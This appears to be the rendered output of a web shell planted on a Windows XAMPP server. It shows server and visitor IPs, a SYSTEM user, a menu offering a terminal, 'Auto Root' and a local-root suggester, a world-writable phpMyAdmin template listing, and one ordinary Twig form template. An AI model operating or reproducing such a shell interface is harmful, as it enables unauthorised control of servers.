Windows NT KAMIDAKI 10.0 build 19045 (Windows 10) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.3.9
Server IP : 192.168.3.16 & Your IP : 216.73.216.140
Domains :
Cant Read [ /etc/named.conf ]
User : SISTEMA
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
C: /
xampp /
phpMyAdmin /
templates /
table /
Delete
Unzip
Name
Size
Permission
Date
Action
browse_foreigners
[ DIR ]
drwxrwxrwx
2024-07-26 17:41
chart
[ DIR ]
drwxrwxrwx
2024-07-26 17:41
delete
[ DIR ]
drwxrwxrwx
2024-07-26 17:41
export
[ DIR ]
drwxrwxrwx
2024-07-26 17:41
find_replace
[ DIR ]
drwxrwxrwx
2024-07-26 17:41
gis_visualization
[ DIR ]
drwxrwxrwx
2024-07-26 17:41
import
[ DIR ]
drwxrwxrwx
2024-07-26 17:41
insert
[ DIR ]
drwxrwxrwx
2024-07-26 17:41
maintenance
[ DIR ]
drwxrwxrwx
2024-07-26 17:41
operations
[ DIR ]
drwxrwxrwx
2024-07-26 17:41
partition
[ DIR ]
drwxrwxrwx
2024-07-26 17:41
privileges
[ DIR ]
drwxrwxrwx
2024-07-26 17:41
relation
[ DIR ]
drwxrwxrwx
2024-07-26 17:41
search
[ DIR ]
drwxrwxrwx
2024-07-26 17:41
structure
[ DIR ]
drwxrwxrwx
2024-07-26 17:41
tracking
[ DIR ]
drwxrwxrwx
2024-07-26 17:41
zoom_search
[ DIR ]
drwxrwxrwx
2024-07-26 17:41
index_form.twig
10.26
KB
-rw-rw-rw-
2023-02-07 22:26
index_rename_form.twig
1.01
KB
-rw-rw-rw-
2023-02-07 22:26
page_with_secondary_tabs.twig
986
B
-rw-rw-rw-
2023-02-07 22:26
start_and_number_of_rows_fieldset.twig
946
B
-rw-rw-rw-
2023-02-07 22:26
Save
Rename
<form action="{{ url('/table/indexes/rename') }}" method="post" name="index_frm" id="index_frm" class="ajax"> {{ get_hidden_inputs(form_params) }} <fieldset class="pma-fieldset" id="index_edit_fields"> <div class="index_info"> <div> <div class="label"> <strong> <label for="input_index_name"> {% trans 'Index name:' %} {{ show_hint('"PRIMARY" <b>must</b> be the name of and <b>only of</b> a primary key!'|trans) }} </label> </strong> </div> <input type="text" name="index[Key_name]" id="input_index_name" size="25" maxlength="64" value="{{ index.getName() }}" onfocus="this.select()"> </div> </div> </fieldset> <fieldset class="pma-fieldset tblFooters"> <button class="btn btn-secondary" type="submit" id="preview_index_frm">{% trans 'Preview SQL' %}</button> </fieldset> </form>